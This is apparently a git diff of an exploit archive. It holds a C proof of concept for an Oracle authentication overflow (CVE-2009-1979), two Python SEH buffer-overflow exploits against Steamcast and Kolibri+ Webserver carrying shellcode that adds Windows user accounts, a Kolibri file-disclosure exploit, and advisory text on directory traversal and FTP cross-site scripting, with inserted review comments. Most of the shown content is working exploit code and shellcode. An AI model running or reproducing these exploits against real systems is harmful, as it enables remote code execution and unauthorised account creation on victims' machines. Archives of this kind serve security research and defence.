- "\x2E\x31\x2E\x30\x00"
- , 37);
-
- s_recv (s);
-
- // send TTIDTY
-
- s_send (s,
-
- "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
- "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
- "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
- "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
- "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
- , 75);
-
- s_recv (s);
-
-
- // call OSESSKEY
-
- s_send (s,
-
- "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
- "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
- "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
- "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
- "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
- "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
- "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
- "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
- "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
- "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
- "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
- "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
- "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
- "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
- , 218);
-
- // call OAUTH
-
- memcpy (pkt1318,
- "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
- "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
- "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
- "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
- "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
- "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
- "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
- "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
- "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
- "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
- "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
- "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
- "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
- "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
- "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
- "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
- "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
- "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
- "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
- "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
- "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
- "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
- "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
- "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
- "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
- "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
- "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
- "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
- "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
- "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
- "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
- "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
- "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
- "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
- "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
- "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
- "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
- "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
- "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
- "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
- "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
- "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
- "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
- "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
- "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
- "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
- "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
- "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
- "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
- "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
- "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
- "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
- "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
- "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
- "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
- "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
- "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
- "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
- "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
- "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
- "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
- "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
- "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
- "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
- "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
- "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
- "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
- "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
- "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
- "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
- "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
- "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
- "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
- "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
- "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
- "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
- "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
- "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
- "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
- "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
- "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
- "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
- "\x00\x00\x00\x00\x00\x00"
- ,1318);
-
- pkt1318[0x41]=0x80;
-
- s_send (s, pkt1318, 1318);
-
- assert (closesocket (s)==0);
- return true;
- }
- else
- {
- printf ("while connect(): select() returns zero\n");
- assert (closesocket (s)==0);
- return false;
- };
-};
-
-void main(int argc, char * argv[])
-{
-
- printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
- printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
- if (argv[1]==NULL)
- {
- printf ("use: %s <hostname>\n", argv[0]);
- return;
- };
-
- try_host (argv[1]);
-};
\ No newline at end of file
diff --git a/platforms/windows/remote/20324.txt b/platforms/windows/remote/20324.txt
index 999b61596..b1e0bed5d 100755
--- a/platforms/windows/remote/20324.txt
+++ b/platforms/windows/remote/20324.txt
@@ -1,7 +1,7 @@ source: http://www.securityfocus.com/bid/1839/info -Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: +Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: - The Agent services server on port 8100/tcp - The End Entity services server on port 443/tcp (Accessible through SSL) diff --git a/platforms/windows/remote/20325.txt b/platforms/windows/remote/20325.txt index a0bb52285..83f8909cf 100755 --- a/platforms/windows/remote/20325.txt +++ b/platforms/windows/remote/20325.txt @@ -1,7 +1,7 @@ source: http://www.securityfocus.com/bid/1839/info -Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: +Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: - The Agent services server on port 8100/tcp - The End Entity services server on port 443/tcp (Accessible through SSL) diff --git a/platforms/windows/remote/32517.html b/platforms/windows/remote/32517.html index c43bc5022..f4da9c098 100755 --- a/platforms/windows/remote/32517.html +++ b/platforms/windows/remote/32517.html 
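Review bot: The rewritten sentence on the `+` line of the 20324.txt hunk still reads `in both iPlanet Certificate Management System (CMS).` after Netscape Directory Server was removed, so `both` is left dangling and the sentence no longer parses. Change it to `...directory traversal techniques in iPlanet Certificate Management System (CMS). This is made possible...`, which mirrors how the sibling 20325.txt hunk was worded for Directory Server. The `\../` description and the two service bullets are unchanged context and fit the CMS-only scope of this entry. The remainder of the advisory lies outside the hunk.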
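Review bot: The new sentence in the 20325.txt hunk narrows this entry to Netscape Directory Server, but the unchanged context lines that follow still list `The Agent services server on port 8100/tcp` and `The End Entity services server on port 443/tcp`, names that read as iPlanet CMS subsystems rather than Directory Server ones. Confirm those two bullets apply to Directory Server; if they do not, drop them from this file (they remain in 20324.txt) or replace them with the Directory Server endpoint the BID describes. This is inferred from the service names alone, not from anything else visible in the hunk. The rest of the advisory lies outside the hunk.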
@@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/31855/info -Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. +Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. diff --git a/platforms/windows/remote/32518.txt b/platforms/windows/remote/32518.html similarity index 69% rename from platforms/windows/remote/32518.txt rename to platforms/windows/remote/32518.html index 17b38cba1..b3da90d9d 100755 --- a/platforms/windows/remote/32518.txt +++ b/platforms/windows/remote/32518.html @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/31855/info -Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. +Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. diff --git a/platforms/windows/remote/8422.py b/platforms/windows/remote/8422.py index b8680ce62..e18654b84 100755 --- a/platforms/windows/remote/8422.py +++ b/platforms/windows/remote/8422.py 
@@ -1,59 +1,59 @@
-#!/usr/bin/python
-#[*] Usage : steamcast.py [victime_ip]
-#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
-#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
-#[*] Tested on : Xp sp2 (fr)
-#[*] Exploited by : His0k4
-#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
-#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
-#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
-
-#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
-#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
-#Other note : The shellcode will be executed when the program will be closed.
-#Another one : When you have problems with running the exploit msg me before you msg str0ke.
-
-import sys, socket
-import struct
-
-host = sys.argv[1]
-port = 8000
-
-
-# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
-shellcode=(
-"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
-"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
-"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
-"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
-"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
-"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
-"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
-"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
-"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
-"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
-"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
-"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
-"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
-"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
-"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
-
-shellunt=(
-"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
-"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
-
-
-exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
-
-#It needs a loop to works
-while 1:
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host, port))
- head = "GET / HTTP/1.1\r\n"
- head += "Host: "+host+"\r\n"
- head += exploit+"\r\n"
- head += "\r\n\r\n"
-
- s.send(head)
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/python
+#[*] Usage : steamcast.py [victime_ip]
+#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
+#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
+#[*] Tested on : Xp sp2 (fr)
+#[*] Exploited by : His0k4
+#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
+#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
+#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
+
+#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
+#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
+#Other note : The shellcode will be executed when the program will be closed.
+#Another one : When you have problems with running the exploit msg me before you msg str0ke.
+
+import sys, socket
+import struct
+
+host = sys.argv[1]
+port = 8000
+
+
+# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
+shellcode=(
+"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
+"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
+"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
+"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
+"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
+"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
+"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
+"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
+"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
+"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
+"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
+"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
+"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
+"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
+"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
+
+shellunt=(
+"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+
+exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
+
+#It needs a loop to works
+while 1:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+ head = "GET / HTTP/1.1\r\n"
+ head += "Host: "+host+"\r\n"
+ head += exploit+"\r\n"
+ head += "\r\n\r\n"
+
+ s.send(head)
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/remote/9638.txt b/platforms/windows/remote/9638.txt
index 767436e22..4e5bd634a 100755
--- a/platforms/windows/remote/9638.txt
+++ b/platforms/windows/remote/9638.txt
@@ -1,21 +1,21 @@
-#############################################################################################
-#
-# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
-# Author : Skull-HacKeR
-#
-#############################################################################################
-
-
-[*] Download Page :
-http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
-
-
-[*] Attack type : Remote
-
-[*] Exploitation
-
-Exploit:
-http://127.0.0.1/default.asp.
-http://127.0.0.1/default.php.
-
-# milw0rm.com [2009-09-11]
+#############################################################################################
+#
+# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
+# Author : Skull-HacKeR
+#
+#############################################################################################
+
+
+[*] Download Page :
+http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
+
+
+[*] Attack type : Remote
+
+[*] Exploitation
+
+Exploit:
+http://127.0.0.1/default.asp.
+http://127.0.0.1/default.php.
+
+# milw0rm.com [2009-09-11]
diff --git a/platforms/windows/remote/9644.py b/platforms/windows/remote/9644.py
index bd4cbdfb9..dcbc8c854 100755
--- a/platforms/windows/remote/9644.py
+++ b/platforms/windows/remote/9644.py
@@ -1,85 +1,85 @@ -#!/usr/bin/python -# -# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret -# to work correctly despite the large number of usable addresses that were tested. -# -# $ ./kolibri.py 192.168.1.146 8080 -# -# [*] Kolibri+ Webserver 2 SEH Overwrite -# [*] Written by blake -# [*] Tested on Windows XP SP 1 -# [*] Denial of Service found by Usman Saeed -# -# [+] Connecting to 192.168.1.146 on port 8080 -# [+] Sending payload -# [+] Done. User jenny created with the password of pass on 192.168.1.146 - -import socket, sys - -print "\n[*] Kolibri+ Webserver 2 SEH Overwrite" -print "[*] Written by blake" -print "[*] Tested on Windows XP SP 1" -print "[*] Denial of Service found by Usman Saeed\n" - -if len(sys.argv)!= 3: - print "[*] Usage: %s <ip> <port>" - sys.exit(0) - -host = sys.argv[1] -port = int(sys.argv[2]) - -# windows/adduser - 446 bytes Encoder: x86/alpha_mixed -# USER=jenny, EXITFUNC=seh, PASS=pass - -shellcode = ( -"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" -"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" -"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" -"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50" -"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f" -"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" -"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" -"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49" -"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b" -"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46" -"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" -"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45" -"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f" -"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50" 
-"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d" -"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42" -"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58" -"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42" -"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30" -"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44" -"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e" -"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51" -"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56" -"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43" -"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30" -"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44" -"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43" -"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46" -"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41") - -payload = "\x41" * 8 # junk buffer -payload += "\x90" * 10 # nop sled -sc = shellcode # 446 bytes of shellcode -jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes -next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes -seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll -junk = "\x41" * 424 # junk buffer - -print "[+] Connecting to %s on port %d" % (host,port) -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -try: - s.connect((host,port)) - print "[+] Sending payload" - s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n") - s.close() - print "[+] Done. User jenny created with the password of pass on %s\n" % host -except: - print "[x] Could not connect!" - -# milw0rm.com [2009-09-11] +#!/usr/bin/python +# +# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret +# to work correctly despite the large number of usable addresses that were tested. 
